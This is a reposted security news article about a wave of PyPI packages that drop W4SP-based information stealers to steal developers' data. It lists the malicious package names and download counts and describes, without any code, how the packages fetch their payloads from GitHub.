Hackers bombard PyPi platform with information-stealing malware

Hand stealing data through a computer

The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers’ data.

The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.

Since then, an additional 31 packages dropping ‘W4SP’ have been removed from the PyPI repository, with the malware’s operators continuing to seek new ways to reintroduce their malware on the platform.

Targeting open-source developers

Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload.

The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.

The malicious packages that contain these information stealers are:

  • modulesecurity – 114 downloads
  • informmodule – 110 downloads
  • chazz – 118 downloads
  • randomtime – 118 downloads
  • proxygeneratorbil – 91 downloads
  • easycordey – 122 downloads
  • easycordeyy – 103 downloads
  • tomproxies – 150 downloads
  • sys-ej – 186 downloads
  • py4sync – 453 downloads
  • infosys – 191 downloads
  • sysuptoer – 186 downloads
  • nowsys – 202 downloads
  • upamonkws – 205 downloads
  • captchaboy – 123 downloads
  • proxybooster – 69 downloads

While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code.

“Each deployment appears to have simply tried to do a find/replace of the W4SP references in exchange for some other seemingly arbitrary name. In some cases, not all references were removed and trace strings of “W4SP” remain.” – Phylum.

With one exception, “chazz,” the new stealers do not follow W4SP’s complex attack chain that features multiple stages and code obfuscation.

Instead, they drop the stealer’s code directly into the “main.py” or the “_init_.py” files with no encoding, so a basic code review immediately reveals their nature.

Informmodule _init_.py code
Informmodule ‘_init_.py’ code (Phylum)

The “chazz” package, which drops a copy of the “Leaf $tealer,” is the only one of the new batch that features some obfuscation via the BlankOBF tool, but it’s still reasonably easy to deobfuscat

Following the same tactics as with the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload.

The GitHub repository of Satan Stealer
The GitHub repository of Satan Stealer (Phylum)

It is unclear whether these malware “clones” are operated by the same threat actors behind W4SP or its copycats, but Phylum hypothesizes it’s from different groups that attempt to mimic previous campaigns.

All the packages presented in this report have been removed from the PyPI repository, but not before they were downloaded over 2,500 times.

Hackers have been increasingly targeting open-source package repositories as compromising developer’s systems offers an opportunity for even larger attacks.

As developers commonly store authorization tokens and API keys in their applications, stealing these secrets could allow threat actors to conduct more widespread supply chain attacks or steal data for use in extortion demands.

As long as the infection numbers make an effort worthwhile, we will continue to see threat actors uploading malicious packages on open-source repositories under different names and accounts.


Original Source


A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on Patreon using the button below

Digital Patreon Wordmark FieryCoralv2

To keep up to date follow us on the below channels.

join
Click Above for Telegram
discord
Click Above for Discord
reddit
Click Above for Reddit
hd linkedin
Click Above For LinkedIn